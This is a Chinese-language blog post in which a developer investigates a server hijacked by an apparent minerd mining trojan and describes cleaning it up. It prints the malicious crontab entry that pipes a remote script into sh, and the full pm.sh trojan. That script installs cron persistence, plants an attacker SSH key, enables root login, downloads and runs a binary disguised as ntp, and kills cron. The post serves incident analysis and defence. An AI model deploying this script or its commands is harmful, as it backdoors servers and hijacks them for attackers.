<!doctype html>



  


<html class="theme-next pisces use-motion">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>



<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />












  
  
  <link href="/vendors/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/vendors/font-awesome/css/font-awesome.min.css?v=4.4.0" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.0.1" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="攻击,挂马," />








  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.0.1" />






<meta name="description" content="发现服务器被当成了肉鸡，不停的向外发包，以致于CPU飙高以及网络拥挤。经过排查发现了一个木马，并杀掉了向外发包的进程，但不能确定系统已经清理完全了，还需要观察

问题执行 top -c 命令，发现异常

这个进程把CPU资源基本耗尽了，当时想找一下进程的启动文件路径，但方式不对，所以就鲁莽的把进程杀掉了。其实可以执行 cd /proc/xxx 命令切换到进程信息目录，其中xxx是进程id，之后执">
<meta property="og:type" content="article">
<meta property="og:title" content="服务器被挂马，执行对外DDoS攻击">
<meta property="og:url" content="http://chenchi.me/2016/08/23/服务器被挂马，执行对外DDoS攻击/index.html">
<meta property="og:site_name" content="ccincd's blog">
<meta property="og:description" content="发现服务器被当成了肉鸡，不停的向外发包，以致于CPU飙高以及网络拥挤。经过排查发现了一个木马，并杀掉了向外发包的进程，但不能确定系统已经清理完全了，还需要观察

问题执行 top -c 命令，发现异常

这个进程把CPU资源基本耗尽了，当时想找一下进程的启动文件路径，但方式不对，所以就鲁莽的把进程杀掉了。其实可以执行 cd /proc/xxx 命令切换到进程信息目录，其中xxx是进程id，之后执">
<meta property="og:image" content="http://oax5iq75d.bkt.clouddn.com/pps.png">
<meta property="og:image" content="http://oax5iq75d.bkt.clouddn.com/%E5%B1%8F%E5%B9%95%E5%BF%AB%E7%85%A7%202016-08-23%2013.05.54.png">
<meta property="og:image" content="http://oax5iq75d.bkt.clouddn.com/crontab.png">
<meta property="og:updated_time" content="2016-08-23T06:35:59.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="服务器被挂马，执行对外DDoS攻击">
<meta name="twitter:description" content="发现服务器被当成了肉鸡，不停的向外发包，以致于CPU飙高以及网络拥挤。经过排查发现了一个木马，并杀掉了向外发包的进程，但不能确定系统已经清理完全了，还需要观察

问题执行 top -c 命令，发现异常

这个进程把CPU资源基本耗尽了，当时想找一下进程的启动文件路径，但方式不对，所以就鲁莽的把进程杀掉了。其实可以执行 cd /proc/xxx 命令切换到进程信息目录，其中xxx是进程id，之后执">
<meta name="twitter:image" content="http://oax5iq75d.bkt.clouddn.com/pps.png">



<script type="text/javascript" id="hexo.configuration">
  var NexT = window.NexT || {};
  var CONFIG = {
    scheme: 'Pisces',
    sidebar: {"position":"left","display":"post"},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: 0,
      author: '博主'
    }
  };
</script>




  <link rel="canonical" href="http://chenchi.me/2016/08/23/服务器被挂马，执行对外DDoS攻击/"/>

  <title> 服务器被挂马，执行对外DDoS攻击 | ccincd's blog </title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  



  <script type="text/javascript">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "//hm.baidu.com/hm.js?09e9d3bc12a88fa2a8c6d9e74bd5fc72";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>








  
  
    
  

  <div class="container one-collumn sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-meta ">
  

  <div class="custom-logo-site-title">
    <a href="/"  class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <span class="site-title">ccincd's blog</span>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>
  <p class="site-subtitle">陈驰的博客</p>
</div>

<div class="site-nav-toggle">
  <button>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
  </button>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      

      
    </ul>
  

  
</nav>

 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  
  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                服务器被挂马，执行对外DDoS攻击
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            <span class="post-meta-item-icon">
              <i class="fa fa-calendar-o"></i>
            </span>
            <span class="post-meta-item-text">发表于</span>
            <time itemprop="dateCreated" datetime="2016-08-23T12:06:19+08:00" content="2016-08-23">
              2016-08-23
            </time>
          </span>

          
            <span class="post-category" >
              &nbsp; | &nbsp;
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
              
                <span itemprop="about" itemscope itemtype="https://schema.org/Thing">
                  <a href="/categories/技术/" itemprop="url" rel="index">
                    <span itemprop="name">技术</span>
                  </a>
                </span>

                
                

              
            </span>
          

          
            
              <span class="post-comments-count">
                &nbsp; | &nbsp;
                <a href="/2016/08/23/服务器被挂马，执行对外DDoS攻击/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count ds-thread-count" data-thread-key="2016/08/23/服务器被挂马，执行对外DDoS攻击/" itemprop="commentsCount"></span>
                </a>
              </span>
            
          

          

          
          

          
        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <blockquote>
<p><em>发现服务器被当成了肉鸡，不停的向外发包，以致于CPU飙高以及网络拥挤。经过排查发现了一个木马，并杀掉了向外发包的进程，但不能确定系统已经清理完全了，还需要观察</em></p>
</blockquote>
<h3 id="问题"><a href="#问题" class="headerlink" title="问题"></a>问题</h3><p>执行 <em>top -c</em> 命令，发现异常</p>
<p><img src="http://oax5iq75d.bkt.clouddn.com/pps.png" alt=""></p>
<p>这个进程把CPU资源基本耗尽了，当时想找一下进程的启动文件路径，但方式不对，所以就鲁莽的把进程杀掉了。其实可以执行 <em>cd /proc/xxx</em> 命令切换到进程信息目录，其中xxx是进程id，之后执行 <em>ls -al或ll</em> 命令就可以看到进程的启动路径了，如下图中exe所示（示例）：</p>
<p><img src="http://oax5iq75d.bkt.clouddn.com/%E5%B1%8F%E5%B9%95%E5%BF%AB%E7%85%A7%202016-08-23%2013.05.54.png" alt=""></p>
<h3 id="查询和清理"><a href="#查询和清理" class="headerlink" title="查询和清理"></a>查询和清理</h3><p>执行crontab -l命令发现原本应当存储cron表达式的文件之中存储的竟然是Redis内容，考虑到之前<a href="http://chenchi.me/2016/08/18/Redis%E2%80%9C%E6%BC%8F%E6%B4%9E%E2%80%9D%EF%BC%8CSSH%E5%85%8D%E7%99%BB%E5%BD%95%E6%94%BB%E5%87%BB/">Redis漏洞被攻击过</a>，所以这次挂马的方式应该是类似的，crontab的内容如下所示：</p>
<p><img src="http://oax5iq75d.bkt.clouddn.com/crontab.png" alt=""></p>
<p>其中有一条命令引起了我的注意：<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">*/1 * * * * curl -L http://r.chanstring.com/pm.sh?0703 | sh</div></pre></td></tr></table></figure></p>
<p>这条命令的意思大致是：<br><font color="red">从0点开始，每隔一个小时去请求参数URL的内容并当作脚本来执行。</font><br>通过浏览器来访问 <em><a href="http://r.chanstring.com/pm.sh?0703" target="_blank" rel="external">http://r.chanstring.com/pm.sh?0703</a></em> ，可以得到木马脚本 <em>pm.sh</em> ，如下所示：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div></pre></td><td class="code"><pre><div class="line"><span class="built_in">export</span> PATH=<span class="variable">$PATH</span>:/bin:/usr/bin:/usr/<span class="built_in">local</span>/bin:/usr/sbin</div><div class="line"></div><div class="line"><span class="built_in">echo</span> <span class="string">"*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh"</span> &gt; /var/spool/cron/root</div><div class="line">mkdir -p /var/spool/cron/crontabs</div><div class="line"><span class="built_in">echo</span> <span class="string">"*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh"</span> &gt; /var/spool/cron/crontabs/root</div><div class="line"></div><div class="line"><span class="keyword">if</span> [ ! <span class="_">-f</span> <span class="string">"/root/.ssh/KHK75NEOiq"</span> ]; <span class="keyword">then</span></div><div class="line">	mkdir -p ~/.ssh</div><div class="line">	rm <span class="_">-f</span> ~/.ssh/authorized_keys*</div><div class="line">	<span class="built_in">echo</span> <span class="string">"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFav root"</span> &gt; ~/.ssh/KHK75NEOiq</div><div class="line">	<span class="built_in">echo</span> <span class="string">"PermitRootLogin yes"</span> &gt;&gt; /etc/ssh/sshd_config</div><div class="line">	<span class="built_in">echo</span> <span class="string">"RSAAuthentication yes"</span> &gt;&gt; /etc/ssh/sshd_config</div><div class="line">	<span class="built_in">echo</span> <span class="string">"PubkeyAuthentication yes"</span> &gt;&gt; /etc/ssh/sshd_config</div><div class="line">	<span class="built_in">echo</span> <span class="string">"AuthorizedKeysFile .ssh/KHK75NEOiq"</span> &gt;&gt; /etc/ssh/sshd_config</div><div class="line">	/etc/init.d/sshd restart</div><div class="line"><span class="keyword">fi</span></div><div class="line"></div><div class="line"><span class="keyword">if</span> [ ! <span class="_">-f</span> <span class="string">"/etc/init.d/ntp"</span> ]; <span class="keyword">then</span></div><div class="line">	<span class="keyword">if</span> [ ! <span class="_">-f</span> <span class="string">"/etc/systemd/system/ntp.service"</span> ]; <span class="keyword">then</span></div><div class="line">		mkdir -p /opt</div><div class="line">		curl -fsSL http://r.chanstring.com/v51/lady_`uname -m` -o /opt/KHK75NEOiq33 &amp;&amp; chmod +x /opt/KHK75NEOiq33 &amp;&amp; /opt/KHK75NEOiq33 -Install</div><div class="line">	<span class="keyword">fi</span></div><div class="line"><span class="keyword">fi</span></div><div class="line"></div><div class="line">/etc/init.d/ntp start</div><div class="line"></div><div class="line">ps auxf|grep -v grep|grep <span class="string">"/usr/bin/cron"</span>|awk <span class="string">'&#123;print $2&#125;'</span>|xargs <span class="built_in">kill</span> -9</div><div class="line">ps auxf|grep -v grep|grep <span class="string">"/opt/cron"</span>|awk <span class="string">'&#123;print $2&#125;'</span>|xargs <span class="built_in">kill</span> -9</div></pre></td></tr></table></figure>
<p>有了这个脚本之后就可以分析黑客对系统究竟动了什么手脚。而因为脚本是通过网络直接获取并执行的，所以本地并没有脚本文件记录，如果不检查crontab，则很难发现。脚本既注入了定时执行，也注册了SSH免密码登录，<font color="red">还将木马程序伪装成ntp（Linux系统的时间服务是ntpd）</font>。<br><br>因为能力有限，自己暂时只能分析到这一步，百度了一下，原来这个木马叫做minerd木马（挖矿木马），有位仁兄分析的很好（<a href="http://jingyan.baidu.com/article/b7001fe1bf71ee0e7282dddb.html" target="_blank" rel="external">彻底清除Linux centos minerd木马</a>），照着他的步骤做，清晰又明了，还能学习不少知识。</p>
<h3 id="继续观察"><a href="#继续观察" class="headerlink" title="继续观察"></a>继续观察</h3><p>这个木马是清理掉了，但感觉系统还有别的木马存在。身为一名开发，没有多少运维和安全的经验，一次疏忽就导致了系统被攻击了数次，但实战中的成长是非常迅速的，希望自己能再接再厉，能够保障系统基本的安全。</p>
<h3 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h3><p><a href="http://blog.itpub.net/24945919/viewspace-744688/" target="_blank" rel="external">Linux中top命令的12个示例</a><br><br><a href="http://blog.csdn.net/tiwen818/article/details/6988105" target="_blank" rel="external">Cron 表达式详解和案例</a><br><br><a href="http://www.cnblogs.com/ericyuan/p/4211352.html" target="_blank" rel="external">Linux 下如何查找木马并处理</a><br><br><a href="http://lovesoo.org/view-processes-running-linux-full-path-method.html" target="_blank" rel="external">Linux查看进程运行的完整路径方法</a><br><br><a href="http://blog.csdn.net/foxman209/article/details/6278093/" target="_blank" rel="external">curl命令详解</a><br></p>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/攻击/" rel="tag">#攻击</a>
          
            <a href="/tags/挂马/" rel="tag">#挂马</a>
          
        </div>
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2016/08/21/Linux调整-root硬盘空间/" rel="next" title="Linux调整/root硬盘空间">
                <i class="fa fa-chevron-left"></i> Linux调整/root硬盘空间
              </a>
            
          </div>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2016/09/01/SpringMVC使用Dubbo和Zookeeper的例子/" rel="prev" title="SpringMVC使用Dubbo和Zookeeper的例子">
                SpringMVC使用Dubbo和Zookeeper的例子 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
        <div class="ds-share flat" data-thread-key="2016/08/23/服务器被挂马，执行对外DDoS攻击/"
     data-title="服务器被挂马，执行对外DDoS攻击"
     data-content=""
     data-url="http://chenchi.me/2016/08/23/服务器被挂马，执行对外DDoS攻击/">
  <div class="ds-share-inline">
    <ul  class="ds-share-icons-16">

      <li data-toggle="ds-share-icons-more"><a class="ds-more" href="javascript:void(0);">分享到：</a></li>
      <li><a class="ds-weibo" href="javascript:void(0);" data-service="weibo">微博</a></li>
      <li><a class="ds-qzone" href="javascript:void(0);" data-service="qzone">QQ空间</a></li>
      <li><a class="ds-qqt" href="javascript:void(0);" data-service="qqt">腾讯微博</a></li>
      <li><a class="ds-wechat" href="javascript:void(0);" data-service="wechat">微信</a></li>

    </ul>
    <div class="ds-share-icons-more">
    </div>
  </div>
</div>
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
      <div class="ds-thread" data-thread-key="2016/08/23/服务器被挂马，执行对外DDoS攻击/"
           data-title="服务器被挂马，执行对外DDoS攻击" data-url="http://chenchi.me/2016/08/23/服务器被挂马，执行对外DDoS攻击/">
      </div>
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel ">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="http://oax5iq75d.bkt.clouddn.com/IMG_9837.JPG"
               alt="Chi Chen" />
          <p class="site-author-name" itemprop="name">Chi Chen</p>
          <p class="site-description motion-element" itemprop="description">一涧入苍烟，千花绕涧边；花开与花落，流水送流年</p>
        </div>
        <nav class="site-state motion-element">
          <div class="site-state-item site-state-posts">
            <a href="/archives">
              <span class="site-state-item-count">9</span>
              <span class="site-state-item-name">日志</span>
            </a>
          </div>

          
            <div class="site-state-item site-state-categories">
              <a href="/categories">
                <span class="site-state-item-count">3</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            <div class="site-state-item site-state-tags">
              <a href="/tags">
                <span class="site-state-item-count">20</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        

        <div class="links-of-author motion-element">
          
        </div>

        
        

        
        

      </section>

      
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">
            
              
            
            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#问题"><span class="nav-number">1.</span> <span class="nav-text">问题</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#查询和清理"><span class="nav-number">2.</span> <span class="nav-text">查询和清理</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#继续观察"><span class="nav-number">3.</span> <span class="nav-text">继续观察</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#参考"><span class="nav-number">4.</span> <span class="nav-text">参考</span></a></li></ol></div>
            
          </div>
        </section>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy; 
  <span itemprop="copyrightYear">2016</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Chi Chen</span>
</div>

<div class="powered-by">
  由 <a class="theme-link" href="http://hexo.io">Hexo</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Pisces
  </a>
</div>

        

        
      </div>
    </footer>

    <div class="back-to-top">
      <i class="fa fa-arrow-up"></i>
    </div>
  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  



  
  <script type="text/javascript" src="/vendors/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/vendors/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/vendors/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/vendors/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/vendors/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/vendors/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.0.1"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.0.1"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.0.1"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.0.1"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.0.1"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.0.1"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.0.1"></script>



  

  
    
  

  <script type="text/javascript">
    var duoshuoQuery = {short_name:"ccincd"};
    (function() {
      var ds = document.createElement('script');
      ds.type = 'text/javascript';ds.async = true;
      ds.id = 'duoshuo-script';
      ds.src = (document.location.protocol == 'https:' ? 'https:' : 'http:') + '//static.duoshuo.com/embed.js';
      ds.charset = 'UTF-8';
      (document.getElementsByTagName('head')[0]
      || document.getElementsByTagName('body')[0]).appendChild(ds);
    })();
  </script>

  
    
    <script src="/vendors/ua-parser-js/dist/ua-parser.min.js?v=0.7.9"></script>
    <script src="/js/src/hook-duoshuo.js"></script>
  






  
  

  

  

  

</body>
</html>
